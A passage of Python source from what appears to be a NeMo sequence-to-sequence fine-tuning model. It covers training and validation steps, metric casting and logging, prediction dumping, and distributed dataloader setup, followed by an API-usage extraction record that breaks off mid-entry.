        micro_batch_size = batch[0]['text_enc'].size(0)
        # This should happen only on the last batch of the dataset.
        if micro_batch_size != self.cfg.data.train_ds.micro_batch_size:
            app_state = AppState()
            _reconfigure_microbatch_calculator(
                rank=app_state.global_rank,
                rampup_batch_size=None,
                global_batch_size=micro_batch_size
                * parallel_state.get_data_parallel_world_size()
                * get_num_microbatches(),
                micro_batch_size=micro_batch_size,
                data_parallel_size=parallel_state.get_data_parallel_world_size(),
            )
        # At this point batch is a list of dictionaries where eatch dict is a microbatch.
        # After the process_global_batch call, batch will be a single dictionary containing the global batch.
        # This is required since the parent class expects a single global batch dictioanry.
        batch = self._process_global_batch(batch)
        return super().training_step(batch, batch_idx)
    def cast_for_metric(self, pred, label, metric_name):
        """Cast decoded prediction/label strings to the dtype the metric expects.

        Correlation metrics require float tensors, classification metrics require
        int tensors; exact string match keeps the raw strings.

        Raises:
            ValueError: If the label cannot be cast, or the metric is unsupported.
        """
        if metric_name == 'exact_string_match':
            return pred, label
        pred = pred.replace(' ', '')
        label = label.replace(' ', '')
        # Correlation metrics require casting to float.
        if metric_name in ['pearson_corr_coef', 'spearman_corr_coef']:
            # Text-to-text model predictions may not always be valid floating point numbers.
            try:
                pred = float(pred)
            except ValueError:
                pred = 0.0
            try:
                label = float(label)
            except ValueError:
                raise ValueError(f'Could not convert {label} to float.')
            pred = torch.FloatTensor([pred]).to(self.device)
            label = torch.FloatTensor([label]).to(self.device)
        # Other metrics require casting to integers.
        elif metric_name in ['accuracy', 'auc', 'auroc', 'average_precision', 'f1']:
            # Text-to-text model predictions may not always be valid integers.
            try:
                pred = int(pred)
            except ValueError:
                pred = 0
            try:
                label = int(label)
            except ValueError:
                raise ValueError(f'Could not convert {label} to int.')
            pred = torch.LongTensor([pred]).to(self.device)
            label = torch.LongTensor([label]).to(self.device)
        else:
            raise ValueError(f'Metric {metric_name} not supported.')
        return pred, label
    def inference_step(self, batch, batch_idx, mode, dataloader_idx=0):
        """Shared validation/test step: compute loss, decode predictions, update metrics.

        Returns:
            Dict with 'loss', decoded 'preds'/'labels'/'inputs' text, and 'categories'
            (languages for XNLI, else a list of None).
        """
        # A batch with 7 fields carries language info (XNLI) — assumption based on
        # the 'lang' handling below; confirm against the dataset's collate_fn.
        batch_has_lang_information = len(batch[0]) == 7
        micro_batch_size = batch[0]['text_enc'].size(0)
        # This should happen only on the last batch of the dataset.
        if micro_batch_size != self.cfg.data.validation_ds.micro_batch_size:
            app_state = AppState()
            _reconfigure_microbatch_calculator(
                rank=app_state.global_rank,
                rampup_batch_size=None,
                global_batch_size=micro_batch_size
                * parallel_state.get_data_parallel_world_size()
                * get_num_microbatches(),
                micro_batch_size=micro_batch_size,
                data_parallel_size=parallel_state.get_data_parallel_world_size(),
            )
        # At this point processed_batch is a list of dictionaries where eatch dict is a microbatch.
        # After the process_global_batch call, processed_batch will be a single dictionary containing the global batch.
        # This is required since the parent class expects a single global batch dictioanry.
        processed_batch = self._process_global_batch(batch)
        # Call parent validation step to get the loss.
        # NOTE: There could be extra keys in the processed_batch dictionary such as "langs" for XNLI, this will be ignored in the parent class.
        loss = super().validation_step(processed_batch, batch_idx)
        predicted_token_ids, _ = self.decode(
            tokens_enc=processed_batch['text_enc'], enc_mask=processed_batch['enc_mask'], num_tokens_to_generate=30
        )
        # Special ids to text function to handle stripping <eos> and special tokens with sentencepiece tokenizers.
        preds_text = self.ids_to_text(predicted_token_ids)
        labels_text = self.ids_to_text(processed_batch['labels'])
        input_text = self.ids_to_text(processed_batch['text_enc'])
        if not batch_has_lang_information:
            categories = [None] * len(preds_text)
        else:
            categories = processed_batch['lang']
        metric = self.val_metric[dataloader_idx] if mode == 'validation' else self.test_metric[dataloader_idx]
        assert len(categories) == len(preds_text) == len(labels_text)
        for _, (pred, label, category) in enumerate(zip(preds_text, labels_text, categories)):
            # To compute metrics like pearson or spearman correlation, we need to cast the predicted string and labels to floats.
            pred, label = self.cast_for_metric(
                pred, label, self.val_metric_name if mode == 'validation' else self.test_metric_name
            )
            if batch_has_lang_information:
                _ = metric(pred, label, category)
            else:
                _ = metric(pred, label)
        return {
            'loss': loss,
            'preds': preds_text,
            'labels': labels_text,
            'categories': categories,
            'inputs': input_text,
        }
    def ids_to_text(self, batch_ids):
        """Detokenize a batch of token-id tensors to strings, truncating at <eos>."""
        batch_ids = batch_ids.cpu().numpy().tolist()
        texts = []
        for ids in batch_ids:
            if self.tokenizer.eos_id in ids:
                idx = ids.index(self.tokenizer.eos_id)
                ids = ids[:idx]
            # Legacy sentencepiece detokenization still preserves special tokens which messes up exact string match.
            if hasattr(self.tokenizer, 'special_token_to_id'):
                ids = [id for id in ids if id not in self.tokenizer.special_token_to_id.values()]
            text = self.tokenizer.ids_to_text(ids)
            texts.append(text)
        return texts
    def _determine_log_key(self, data_config, dataloader_idx, metric_name, mode):
        """Return the logging key for a given dataloader, metric, and mode."""
        # Function that determines whether to log based on the user provided name of the dataset or the dataloader index.
        base_key = f"{mode}_{metric_name}_" if metric_name is not None else f"{mode}_"
        # If the user provided names for each validation/test dataset, use those.
        if hasattr(data_config, "names") and data_config.names is not None:
            # With only a single validation/test dataset, the name is not a list.
            if not isinstance(data_config.names, ListConfig):
                name = data_config.names
            else:
                name = data_config.names[dataloader_idx]
            return base_key + name
        else:
            return base_key + f"dataloader{dataloader_idx}"
    def inference_epoch_end(self, outputs, mode, data_cfg):
        """Aggregate per-dataloader losses/metrics, log them, and optionally dump predictions.

        Returns:
            Tuple of (averaged loss, averaged metric) across all dataloaders.
        """
        # Parent class will handle logging of the loss.
        if not outputs:
            return
        # Normalize single-dataloader output (list of dicts) to a list of lists.
        if isinstance(outputs[0], dict):
            outputs = [outputs]
        averaged_loss = []
        averaged_metric = []
        metric_name = self.val_metric_name if mode == 'validation' else self.test_metric_name
        # Log metrics for each provided validation/test dataset.
        for dataloader_idx, output in enumerate(outputs):
            loss = super().validation_epoch_end([x['loss'] for x in output])
            # Determine the key used to log the loss based on the user provided name of the dataset or the dataloader index.
            loss_log_key = self._determine_log_key(data_cfg, dataloader_idx, "loss", mode)
            # Determine the key used to log the eval metric based on the user provided name of the dataset or the dataloader index.
            metric_log_key = self._determine_log_key(data_cfg, dataloader_idx, metric_name, mode)
            self.log(loss_log_key, loss)
            metric_object = (
                self.val_metric[dataloader_idx] if mode == 'validation' else self.test_metric[dataloader_idx]
            )
            metric = metric_object.compute()
            # Handle logging of GLUE/XNLI separately here. XNLI has a separate metric per language.
            if isinstance(metric, dict):
                # GLUE case:
                if len(metric) == 1 and 'acc' in metric:
                    metric = metric['acc']
                    self.log(metric_log_key, metric)
                    logging.info(f"{mode} {metric_name}: {metric}")
                # XNLI case where the metric dictionary contains the language and the computed metric as values.
                else:
                    for k, v in metric.items():
                        if k != 'acc' and 'total' not in k:
                            self.log(metric_log_key + f'_{k}', v)
                            logging.info(f"{mode} {metric_name} lang {k} : {v}")
                    metric = metric['acc']
            else:
                self.log(metric_log_key, metric)
                logging.info(f"{mode} {metric_name}: {metric}")
            metric_object.reset()
            averaged_loss.append(loss)
            averaged_metric.append(metric)
            # Write predictions, labels, and inputs to a file for each validation/test dataset.
            if data_cfg.get("write_predictions_to_file", False):
                # Check if the user provided a prefix path to the file(s) they want to write.
                if not hasattr(data_cfg, "output_file_path_prefix") or data_cfg.output_file_path_prefix is None:
                    raise ValueError(
                        f"Cannot write predictions to file when output_file_path_prefix is not set or present in the yaml config file."
                    )
                # Gather the outputs object from all data parallel ranks since we are using the DistributedSampler which splits data across DDP ranks.
                gathered_outputs = [None for _ in range(self.world_size)]
                torch.distributed.all_gather_object(
                    gathered_outputs,
                    [
                        {
                            'preds': x['preds'],
                            'labels': x['labels'],
                            'categories': x['categories'],
                            'inputs': x['inputs'],
                        }
                        for x in output
                    ],
                )
                # Figure out what the suffix of the file should be.
                filename_log_key = self._determine_log_key(data_cfg, dataloader_idx, None, mode)
                # Keep a set of ground truths and inputs to write deduplicated predictions. Distributed Sampler may duplicate examples.
                gt_inp_set = set()
                deduplicated_outputs = {
                    'preds': [],
                    'labels': [],
                    'categories': [],
                    'inputs': [],
                }
                # PTL models have a self.global_rank attribute and we want to write to disk only on global rank 0.
                if self.global_rank == 0:
                    for rank in range(0, self.world_size):
                        for batch in gathered_outputs[rank]:
                            for pred, label, input, category in zip(
                                batch['preds'], batch['labels'], batch['inputs'], batch['categories']
                            ):
                                if input + label not in gt_inp_set:
                                    gt_inp_set.add(input + label)
                                    deduplicated_outputs['preds'].append(pred)
                                    deduplicated_outputs['labels'].append(label)
                                    deduplicated_outputs['categories'].append(category)
                                    deduplicated_outputs['inputs'].append(input)
                    self.write_predictions_to_file(
                        deduplicated_outputs, f"{data_cfg.output_file_path_prefix}_{filename_log_key}"
                    )
                # Barrier so non-zero ranks wait for rank 0 to finish writing.
                torch.distributed.barrier()
        # Logging of the averaged metrics:
        averaged_loss = sum(averaged_loss) / len(averaged_loss)
        averaged_metric = sum(averaged_metric) / len(averaged_metric)
        # Handle case where metrics can be nan or inf. This can break checkpoint save/load.
        if torch.isinf(averaged_metric) or torch.isnan(averaged_metric):
            app_state = AppState()
            monitor_mode = app_state.checkpoint_callback_params.mode
            assert monitor_mode in ['min', 'max']
            # Replace the broken value with the worst possible value for the monitor.
            averaged_metric = 0.0 if monitor_mode == 'max' else 1e5
        if mode == 'validation':
            self.log("validation_loss", averaged_loss)
            self.log(f"validation_{self.val_metric_name}", averaged_metric)
        elif mode == 'test':
            self.log("test_loss", averaged_loss)
            self.log(f"test_{self.test_metric_name}", averaged_metric)
        return averaged_loss, averaged_metric
    def write_predictions_to_file(self, outputs, output_file_path_prefix):
        """Dump inputs, predictions, and labels to '<prefix>_inputs_preds_labels.json'."""
        with open(output_file_path_prefix + "_inputs_preds_labels.json", "w") as f_json:
            json_output = {
                "inputs": outputs["inputs"],
                "preds": outputs["preds"],
                "labels": outputs["labels"],
            }
            json.dump(json_output, f_json)
    def validation_step(self, batch, batch_idx, dataloader_idx=0):
        """PTL hook: delegate to the shared inference step in 'validation' mode."""
        return self.inference_step(batch, batch_idx, 'validation', dataloader_idx)
    def validation_epoch_end(self, outputs):
        """PTL hook: aggregate and log validation results."""
        _ = self.inference_epoch_end(outputs, 'validation', self.cfg.data.validation_ds)
    def test_step(self, batch, batch_idx, dataloader_idx=0):
        """PTL hook: delegate to the shared inference step in 'test' mode."""
        return self.inference_step(batch, batch_idx, 'test', dataloader_idx)
    def test_epoch_end(self, outputs):
        """PTL hook: aggregate and log test results."""
        _ = self.inference_epoch_end(outputs, 'test', self.cfg.data.test_ds)
    def build_data_loader(
        self,
        dataset,
        micro_batch_size,
        global_batch_size,
        shuffle,
        num_workers,
        pin_memory,
        drop_last,
        check_validation_interval,
    ):
        """Build a distributed dataloader for *dataset*.

        When *check_validation_interval* is True, validates that the trainer's
        val_check_interval fits within one epoch of global batches.
        """
        if dataset is None:
            return None
        rank = parallel_state.get_data_parallel_rank()
        world_size = parallel_state.get_data_parallel_world_size()
        sampler = torch.utils.data.distributed.DistributedSampler(
            dataset, num_replicas=world_size, rank=rank, shuffle=shuffle
        )
        # This check makes sure the val_check_interval is less than the number of global batches.
        # Normally, PTL would do this check and properly account for gradient accumulation.
        # But now, it is implicit in the apex fwd/bwd functions and so we need to check for this somewhere.
        # The consequence of not doing this is that training loop will never run validation.
        # NOTE: Prog bar is also broken as a result of this.
        global_batch_size_per_gpu = micro_batch_size * get_num_microbatches()
        if (
            self.trainer.val_check_interval > (sampler.num_samples // global_batch_size_per_gpu)
            and check_validation_interval
        ):
            raise ValueError(
                f"trainer.val_check_interval {self.trainer.val_check_interval} is > number of global batches {sampler.num_samples // global_batch_size}"
            )
        # Data loader. Note that batch size is the per GPU batch size.
        return torch.utils.data.DataLoader(
            dataset,
            collate_fn=dataset.collate_fn,
            sampler=sampler,
            batch_size=micro_batch_size,
            num_workers=num_workers,
            pin_memory=pin_memory,
            drop_last=drop_last,
        )
    def setup_training_data(self):
        """Build the training dataloader from cfg.data.train_ds."""
        self._train_dl = self.build_data_loader(
            self._train_ds,
            micro_batch_size=self.cfg.data.train_ds.micro_batch_size,
            global_batch_size=self.cfg.data.train_ds.global_batch_size,
            shuffle=self.cfg.data.train_ds.shuffle,
            num_workers=self.cfg.data.train_ds.num_workers,
            pin_memory=self.cfg.data.train_ds.pin_memory,
            drop_last=self.cfg.data.train_ds.drop_last,
            check_validation_interval=True,
        )
    def setup_eval_data(self, datasets, data_cfg):
        """Build one dataloader per evaluation dataset; returns the list of loaders."""
        dataloaders = []
        for dataset in datasets:
            eval_dl = self.build_data_loader(
                dataset,
                micro_batch_size=data_cfg.micro_batch_size,
                global_batch_size=data_cfg.global_batch_size,
                shuffle=data_cfg.shuffle,
                num_workers=data_cfg.num_workers,
                pin_memory=data_cfg.pin_memory,
                drop_last=data_cfg.drop_last,
                check_validation_interval=False,
            )
            dataloaders.append(eval_dl)
        return dataloaders
    def setup_validation_data(self):
        """Build validation dataloaders from cfg.data.validation_ds."""
        self._validation_dl = self.setup_eval_data(self._validation_ds, self.cfg.data.validation_ds)
    def setup_test_data(self):
        """Build test dataloaders from cfg.data.test_ds."""
        self._test_dl = self.setup_eval_data(self._test_ds, self.cfg.data.test_ds)
    def _build_train_dataset(self, data_cfg):
        """Build the training dataset."""
        if (
            data_cfg.drop_last is False
            and data_cfg.global_batch_size > data_cfg.micro_batch_size * parallel_state.get_data_parallel_world_size()
        ):
            raise ValueError(
                f"Cannot use drop_last=False in your training data with gradient accumulation found grad acc of {data_cfg.global_batch_size // (data_cfg.micro_batch_size * parallel_state.get_data_parallel_world_size())} with global_batch_size {data_cfg.global_batch_size}, micro_batch_size {data_cfg.micro_batch_size}, data parallel size {parallel_state.get_data_parallel_world_size()}"
            )
        datasets = []
        # Determine if we are using a single dataset or a list of datasets.
        is_src_list_config = isinstance(data_cfg.src_file_name, ListConfig)
        is_tgt_list_config = isinstance(data_cfg.tgt_file_name, ListConfig)
        if (is_src_list_config and not is_tgt_list_config) or (is_tgt_list_config and not is_src_list_config):
            raise ValueError("src_list and tgt_list must both be either a ListConfig or a string. ")
        if is_src_list_config:
            if len(data_cfg.src_file_name) != len(data_cfg.tgt_file_name):
                raise ValueError("src_file_name and tgt_file_name must have the same number of elements. ")
        else:
            # Normalize single paths to one-element lists so the loop below is uniform.
            data_cfg.src_file_name = [data_cfg.src_file_name]
            data_cfg.tgt_file_name = [data_cfg.tgt_file_name]
        for src, tgt in zip(data_cfg.src_file_name, data_cfg.tgt_file_name):
            dataset = SequenceToSequenceDataset(
                src_file_name=src,
                tgt_file_name=tgt,
                src_tokenizer=self.tokenizer,
                tgt_tokenizer=self.tokenizer,
                max_src_seq_length=data_cfg.max_src_seq_length,
                max_tgt_seq_length=data_cfg.max_tgt_seq_length,
            )
            datasets.append(dataset)
        if len(datasets) > 1:
            # Multiple training files are blended into a single ConcatDataset;
            # default sampling is uniform over datasets unless configured otherwise.
            dataset = ConcatDataset(
                datasets=datasets,
                sampling_technique=data_cfg.get('concat_sampling_technique', 'temperature'),
                sampling_temperature=data_cfg.get('concat_sampling_temperature', 5),
                sampling_probabilities=data_cfg.get(
                    'concat_sampling_probabilities', [1 / len(datasets)] * len(datasets)
                ),
                global_rank=parallel_state.get_data_parallel_rank(),
                world_size=parallel_state.get_data_parallel_world_size(),
            )
            return dataset
        else:
            return datasets[0]
    def _build_eval_dataset(self, data_cfg):
        """Build the evaluation dataset."""
        # Eval does not support implicit gradient accumulation: global batch must equal
        # micro batch * data-parallel world size.
        if data_cfg.global_batch_size > data_cfg.micro_batch_size * parallel_state.get_data_parallel_world_size():
            raise ValueError(
                f'You are trying to use "implicit gradient accumulation" of {data_cfg.global_batch_size // (data_cfg.micro_batch_size * parallel_state.get_data_parallel_world_size())} in your validation/test datasets. This is not supported. Please set global_batch_size equal to micro_batch_size * data_parallel_world_size.'
            )
        datasets = []
        # Determine if we are using a single dataset or a list of datasets.
        is_src_list_config = isinstance(data_cfg.src_file_name, ListConfig)
        is_tgt_list_config = isinstance(data_cfg.tgt_file_name, ListConfig)
        is_names_list_config = False
        if hasattr(data_cfg, "names"):
            if isinstance(data_cfg.names, ListConfig):
                is_names_list_config = True
        if (is_src_list_config and not is_tgt_list_config) or (is_tgt_list_config and not is_src_list_config):
            raise ValueError("src_list and tgt_list must both be either a ListConfig or a string. ")
        if is_src_list_config:
            if len(data_cfg.src_file_name) != len(data_cfg.tgt_file_name):
                raise ValueError("src_file_name and tgt_file_name must have the same number of elements. ")
            if is_names_list_config and len(data_cfg.names) != len(data_cfg.src_file_name):
                raise ValueError(
                    "If you are providing names for each src/tgt file, they must have the same number of elements."
                )
        else:
            # Normalize single paths to one-element lists so the loop below is uniform.
            data_cfg.src_file_name = [data_cfg.src_file_name]
            data_cfg.tgt_file_name = [data_cfg.tgt_file_name]
        for src, tgt in zip(data_cfg.src_file_name, data_cfg.tgt_file_name):
            dataset = SequenceToSequenceDataset(
                src_file_name=src,
                tgt_file_name=tgt,
                src_tokenizer=self.tokenizer,
                tgt_tokenizer=self.tokenizer,
                max_src_seq_length=data_cfg.max_src_seq_length,
                max_tgt_seq_length=data_cfg.max_tgt_seq_length,
            )
            datasets.append(dataset)
        return datasets
    def build_train_valid_test_datasets(self, stage):
        """Build datasets for the given stage ('fit'/'validation'/'test')."""
        logging.info('Building datasets ...')
        if stage != 'test':
            self._validation_ds = self._build_eval_dataset(self.cfg.data.validation_ds)
        if stage != 'validation':
            if hasattr(self.cfg.data, 'test_ds'):
                self._test_ds = self._build_eval_dataset(self.cfg.data.test_ds)
        if stage == 'validation' or stage == 'test':
            return
        self._train_ds = self._build_train_dataset(self.cfg.data.train_ds)
        logging.info(f'Finished building datasets ...')
    def on_train_start(self) -> None:
        """PTL hook used to override DataFetcher with GlobalBatchDataFetcher """
        self.trainer.fit_loop._data_fetcher = GlobalBatchDataFetcher()
    def on_validation_start(self) -> None:
        """PTL hook used to override DataFetcher with GlobalBatchDataFetcher """
        self.trainer.fit_loop.epoch_loop.val_loop._data_fetcher = GlobalBatchDataFetcher()
        self.trainer.validate_loop._data_fetcher = GlobalBatchDataFetcher()
    def on_test_start(self) -> None:
        """PTL hook used to override DataFetcher with GlobalBatchDataFetcher."""
        self.trainer.test_loop._data_fetcher = GlobalBatchDataFetcher()
|
[
"nemo.collections.nlp.parts.nlp_overrides.GlobalBatchDataFetcher",
"nemo.utils.logging.info",
"apex.transformer.pipeline_parallel.utils.get_num_microbatches",
"torch.isnan",
"nemo.utils.AppState",
"torch.utils.data.DataLoader",
"torch.isinf",
"torch.FloatTensor",
"apex.transformer.parallel_state.get_data_parallel_rank",
"torch.utils.data.distributed.DistributedSampler",
"apex.transformer.parallel_state.get_data_parallel_world_size",
"json.dump",
"nemo.collections.common.metrics.classification_accuracy.ExactStringPerCategoryMatchMetric",
"torch.nn.ModuleList",
"nemo.collections.common.metrics.MetricStringToTorchMetric.keys",
"torch.LongTensor",
"nemo.utils.logging.warning",
"torch.distributed.all_gather_object",
"torch.distributed.barrier",
"nemo.collections.nlp.data.common.sequence_to_sequence_dataset.SequenceToSequenceDataset"
] |
[((1914, 1950), 'torch.nn.ModuleList', 'torch.nn.ModuleList', (['self.val_metric'], {}), '(self.val_metric)\n', (1933, 1950), False, 'import torch\n'), ((5687, 5697), 'nemo.utils.AppState', 'AppState', ([], {}), '()\n', (5695, 5697), False, 'from nemo.utils import AppState, logging\n'), ((6169, 6179), 'nemo.utils.AppState', 'AppState', ([], {}), '()\n', (6177, 6179), False, 'from nemo.utils import AppState, logging\n'), ((21856, 21895), 'apex.transformer.parallel_state.get_data_parallel_rank', 'parallel_state.get_data_parallel_rank', ([], {}), '()\n', (21893, 21895), False, 'from apex.transformer import parallel_state\n'), ((21917, 21962), 'apex.transformer.parallel_state.get_data_parallel_world_size', 'parallel_state.get_data_parallel_world_size', ([], {}), '()\n', (21960, 21962), False, 'from apex.transformer import parallel_state\n'), ((21981, 22095), 'torch.utils.data.distributed.DistributedSampler', 'torch.utils.data.distributed.DistributedSampler', (['dataset'], {'num_replicas': 'world_size', 'rank': 'rank', 'shuffle': 'shuffle'}), '(dataset, num_replicas=\n world_size, rank=rank, shuffle=shuffle)\n', (22028, 22095), False, 'import torch\n'), ((23090, 23281), 'torch.utils.data.DataLoader', 'torch.utils.data.DataLoader', (['dataset'], {'collate_fn': 'dataset.collate_fn', 'sampler': 'sampler', 'batch_size': 'micro_batch_size', 'num_workers': 'num_workers', 'pin_memory': 'pin_memory', 'drop_last': 'drop_last'}), '(dataset, collate_fn=dataset.collate_fn, sampler\n =sampler, batch_size=micro_batch_size, num_workers=num_workers,\n pin_memory=pin_memory, drop_last=drop_last)\n', (23117, 23281), False, 'import torch\n'), ((29813, 29850), 'nemo.utils.logging.info', 'logging.info', (['"""Building datasets ..."""'], {}), "('Building datasets ...')\n", (29825, 29850), False, 'from nemo.utils import AppState, logging\n'), ((30288, 30335), 'nemo.utils.logging.info', 'logging.info', (['f"""Finished building datasets ..."""'], {}), "(f'Finished building datasets ...')\n", 
(30300, 30335), False, 'from nemo.utils import AppState, logging\n'), ((30502, 30526), 'nemo.collections.nlp.parts.nlp_overrides.GlobalBatchDataFetcher', 'GlobalBatchDataFetcher', ([], {}), '()\n', (30524, 30526), False, 'from nemo.collections.nlp.parts.nlp_overrides import GlobalBatchDataFetcher\n'), ((30718, 30742), 'nemo.collections.nlp.parts.nlp_overrides.GlobalBatchDataFetcher', 'GlobalBatchDataFetcher', ([], {}), '()\n', (30740, 30742), False, 'from nemo.collections.nlp.parts.nlp_overrides import GlobalBatchDataFetcher\n'), ((30794, 30818), 'nemo.collections.nlp.parts.nlp_overrides.GlobalBatchDataFetcher', 'GlobalBatchDataFetcher', ([], {}), '()\n', (30816, 30818), False, 'from nemo.collections.nlp.parts.nlp_overrides import GlobalBatchDataFetcher\n'), ((30904, 30928), 'nemo.collections.nlp.parts.nlp_overrides.GlobalBatchDataFetcher', 'GlobalBatchDataFetcher', ([], {}), '()\n', (30926, 30928), False, 'from nemo.collections.nlp.parts.nlp_overrides import GlobalBatchDataFetcher\n'), ((2123, 2160), 'torch.nn.ModuleList', 'torch.nn.ModuleList', (['self.test_metric'], {}), '(self.test_metric)\n', (2142, 2160), False, 'import torch\n'), ((6707, 6819), 'nemo.utils.logging.warning', 'logging.warning', (['"""No training data found, reconfiguring microbatches based on validation batch sizes."""'], {}), "(\n 'No training data found, reconfiguring microbatches based on validation batch sizes.'\n )\n", (6722, 6819), False, 'from nemo.utils import AppState, logging\n'), ((7516, 7526), 'nemo.utils.AppState', 'AppState', ([], {}), '()\n', (7524, 7526), False, 'from nemo.utils import AppState, logging\n'), ((10257, 10267), 'nemo.utils.AppState', 'AppState', ([], {}), '()\n', (10265, 10267), False, 'from nemo.utils import AppState, logging\n'), ((19932, 19960), 'torch.isinf', 'torch.isinf', (['averaged_metric'], {}), '(averaged_metric)\n', (19943, 19960), False, 'import torch\n'), ((19964, 19992), 'torch.isnan', 'torch.isnan', (['averaged_metric'], {}), '(averaged_metric)\n', 
(19975, 19992), False, 'import torch\n'), ((20018, 20028), 'nemo.utils.AppState', 'AppState', ([], {}), '()\n', (20026, 20028), False, 'from nemo.utils import AppState, logging\n'), ((20929, 20959), 'json.dump', 'json.dump', (['json_output', 'f_json'], {}), '(json_output, f_json)\n', (20938, 20959), False, 'import json\n'), ((22620, 22642), 'apex.transformer.pipeline_parallel.utils.get_num_microbatches', 'get_num_microbatches', ([], {}), '()\n', (22640, 22642), False, 'from apex.transformer.pipeline_parallel.utils import _reconfigure_microbatch_calculator, get_num_microbatches\n'), ((26394, 26626), 'nemo.collections.nlp.data.common.sequence_to_sequence_dataset.SequenceToSequenceDataset', 'SequenceToSequenceDataset', ([], {'src_file_name': 'src', 'tgt_file_name': 'tgt', 'src_tokenizer': 'self.tokenizer', 'tgt_tokenizer': 'self.tokenizer', 'max_src_seq_length': 'data_cfg.max_src_seq_length', 'max_tgt_seq_length': 'data_cfg.max_tgt_seq_length'}), '(src_file_name=src, tgt_file_name=tgt,\n src_tokenizer=self.tokenizer, tgt_tokenizer=self.tokenizer,\n max_src_seq_length=data_cfg.max_src_seq_length, max_tgt_seq_length=\n data_cfg.max_tgt_seq_length)\n', (26419, 26626), False, 'from nemo.collections.nlp.data.common.sequence_to_sequence_dataset import SequenceToSequenceDataset\n'), ((29357, 29589), 'nemo.collections.nlp.data.common.sequence_to_sequence_dataset.SequenceToSequenceDataset', 'SequenceToSequenceDataset', ([], {'src_file_name': 'src', 'tgt_file_name': 'tgt', 'src_tokenizer': 'self.tokenizer', 'tgt_tokenizer': 'self.tokenizer', 'max_src_seq_length': 'data_cfg.max_src_seq_length', 'max_tgt_seq_length': 'data_cfg.max_tgt_seq_length'}), '(src_file_name=src, tgt_file_name=tgt,\n src_tokenizer=self.tokenizer, tgt_tokenizer=self.tokenizer,\n max_src_seq_length=data_cfg.max_src_seq_length, max_tgt_seq_length=\n data_cfg.max_tgt_seq_length)\n', (29382, 29589), False, 'from nemo.collections.nlp.data.common.sequence_to_sequence_dataset import SequenceToSequenceDataset\n'), 
((2347, 2405), 'nemo.collections.common.metrics.classification_accuracy.ExactStringPerCategoryMatchMetric', 'ExactStringPerCategoryMatchMetric', (['self.cfg.eval_languages'], {}), '(self.cfg.eval_languages)\n', (2380, 2405), False, 'from nemo.collections.common.metrics.classification_accuracy import ExactStringPerCategoryMatchMetric\n'), ((6001, 6046), 'apex.transformer.parallel_state.get_data_parallel_world_size', 'parallel_state.get_data_parallel_world_size', ([], {}), '()\n', (6044, 6046), False, 'from apex.transformer import parallel_state\n'), ((16549, 16596), 'nemo.utils.logging.info', 'logging.info', (['f"""{mode} {metric_name}: {metric}"""'], {}), "(f'{mode} {metric_name}: {metric}')\n", (16561, 16596), False, 'from nemo.utils import AppState, logging\n'), ((17522, 17702), 'torch.distributed.all_gather_object', 'torch.distributed.all_gather_object', (['gathered_outputs', "[{'preds': x['preds'], 'labels': x['labels'], 'categories': x['categories'],\n 'inputs': x['inputs']} for x in output]"], {}), "(gathered_outputs, [{'preds': x['preds'],\n 'labels': x['labels'], 'categories': x['categories'], 'inputs': x[\n 'inputs']} for x in output])\n", (17557, 17702), False, 'import torch\n'), ((19622, 19649), 'torch.distributed.barrier', 'torch.distributed.barrier', ([], {}), '()\n', (19647, 19649), False, 'import torch\n'), ((27591, 27636), 'apex.transformer.parallel_state.get_data_parallel_world_size', 'parallel_state.get_data_parallel_world_size', ([], {}), '()\n', (27634, 27636), False, 'from apex.transformer import parallel_state\n'), ((6536, 6581), 'apex.transformer.parallel_state.get_data_parallel_world_size', 'parallel_state.get_data_parallel_world_size', ([], {}), '()\n', (6579, 6581), False, 'from apex.transformer import parallel_state\n'), ((7137, 7182), 'apex.transformer.parallel_state.get_data_parallel_world_size', 'parallel_state.get_data_parallel_world_size', ([], {}), '()\n', (7180, 7182), False, 'from apex.transformer import parallel_state\n'), 
((7902, 7947), 'apex.transformer.parallel_state.get_data_parallel_world_size', 'parallel_state.get_data_parallel_world_size', ([], {}), '()\n', (7945, 7947), False, 'from apex.transformer import parallel_state\n'), ((9083, 9108), 'torch.FloatTensor', 'torch.FloatTensor', (['[pred]'], {}), '([pred])\n', (9100, 9108), False, 'import torch\n'), ((9145, 9171), 'torch.FloatTensor', 'torch.FloatTensor', (['[label]'], {}), '([label])\n', (9162, 9171), False, 'import torch\n'), ((10643, 10688), 'apex.transformer.parallel_state.get_data_parallel_world_size', 'parallel_state.get_data_parallel_world_size', ([], {}), '()\n', (10686, 10688), False, 'from apex.transformer import parallel_state\n'), ((15985, 16032), 'nemo.utils.logging.info', 'logging.info', (['f"""{mode} {metric_name}: {metric}"""'], {}), "(f'{mode} {metric_name}: {metric}')\n", (15997, 16032), False, 'from nemo.utils import AppState, logging\n'), ((24991, 25036), 'apex.transformer.parallel_state.get_data_parallel_world_size', 'parallel_state.get_data_parallel_world_size', ([], {}), '()\n', (25034, 25036), False, 'from apex.transformer import parallel_state\n'), ((27232, 27271), 'apex.transformer.parallel_state.get_data_parallel_rank', 'parallel_state.get_data_parallel_rank', ([], {}), '()\n', (27269, 27271), False, 'from apex.transformer import parallel_state\n'), ((27300, 27345), 'apex.transformer.parallel_state.get_data_parallel_world_size', 'parallel_state.get_data_parallel_world_size', ([], {}), '()\n', (27343, 27345), False, 'from apex.transformer import parallel_state\n'), ((7792, 7814), 'apex.transformer.pipeline_parallel.utils.get_num_microbatches', 'get_num_microbatches', ([], {}), '()\n', (7812, 7814), False, 'from apex.transformer.pipeline_parallel.utils import _reconfigure_microbatch_calculator, get_num_microbatches\n'), ((9687, 9711), 'torch.LongTensor', 'torch.LongTensor', (['[pred]'], {}), '([pred])\n', (9703, 9711), False, 'import torch\n'), ((9748, 9773), 'torch.LongTensor', 'torch.LongTensor', 
